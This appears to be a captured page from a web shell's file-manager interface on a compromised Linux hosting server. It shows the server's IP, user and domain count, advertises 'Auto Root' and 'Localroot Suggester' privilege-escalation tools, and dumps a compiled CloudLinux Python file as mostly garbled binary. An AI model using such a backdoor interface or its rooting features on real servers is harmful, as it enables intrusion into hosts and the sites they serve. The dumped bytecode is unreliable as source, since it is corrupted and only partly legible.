Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
l.v.e-manager /
utils /
__pycache__ /
Delete
Unzip
Name
Size
Permission
Date
Action
cloudlinux_cli.cpython-311.pyc
67.25
KB
-rw-r--r--
2026-08-11 11:38
cloudlinux_cli_user.cpython-311.pyc
23.41
KB
-rw-r--r--
2026-08-11 11:38
cpanel_api.cpython-311.pyc
14.66
KB
-rw-r--r--
2026-08-11 11:38
dynamicui_base.cpython-311.pyc
1.1
KB
-rw-r--r--
2026-08-11 11:38
dynamicui_cpanel.cpython-311.pyc
6.03
KB
-rw-r--r--
2026-08-11 11:38
dynamicui_da.cpython-311.pyc
4.84
KB
-rw-r--r--
2026-08-11 11:38
dynamicui_plesk.cpython-311.pyc
2.25
KB
-rw-r--r--
2026-08-11 11:38
libcagefs.cpython-311.pyc
10.05
KB
-rw-r--r--
2026-08-11 11:38
libcloudlinux.cpython-311.pyc
46.66
KB
-rw-r--r--
2026-08-11 11:38
libsupport.cpython-311.pyc
2.38
KB
-rw-r--r--
2026-08-11 11:38
sync_locales.cpython-311.pyc
5.05
KB
-rw-r--r--
2026-08-11 11:38
ui_package_installer.cpython-311.pyc
7.88
KB
-rw-r--r--
2026-09-04 11:50
Save
Rename
� ��P�G��� �T � d dl mZ d dl mZ d dl mZ d dlZd dlZ dZdZd� ZdZ d � Z dS ) � )�print_function)�division)�absolute_importNiq��i���c �� � t dd�g}| � d� � dk r? t � � }|r|� t |d�� � n# t $ r Y nw xY w|S )a Build custom fields array based on existing 'send' params. - Always adds PRODUCT field with value 'cloudlinux' - Adds CLN and AGREEMENT when present in params - If clDoctor == 'true', runs doctor and adds DOCTOR_ID field Returns: list of dicts with 'id' and 'value' � cloudlinux)�id�value� runDoctor�true)�_PRODUCT_ID�get�_get_doctor_key�append� _DOCTOR_ID� Exception)�params�fields� doctor_keys �p/builddir/build/BUILDROOT/lvemanager-7.11.47-1.el9.cloudlinux.x86_64/usr/share/l.v.e-manager/utils/libsupport.py�$build_custom_fields_from_send_paramsr s� � � ��� � �F� �z�z�+���&�(�(� �(�*�*�J�� G�� � �Z�*�E�E�F�F�F���� � � ��D� ���� �Ms �-A � A!� A!z/usr/sbin/cldoctorc �z � dd l } | j � t � � r | � t | j � � st dt z � � �t j t gt j d�� � }t j d|� � }|st d� � �|� d� � S )Nr zocldoctor binary is not installed at %s; refusing to fetch and execute a remote shell script for the doctor key.T)�stderr�textz Key: ([^ ]+) z+cldoctor output did not include a Key: line� ) �os�path�isfile� _CLDOCTOR_BIN�access�X_OK�RuntimeError� subprocess�check_output�STDOUT�re�search�group)r �response�results r r r <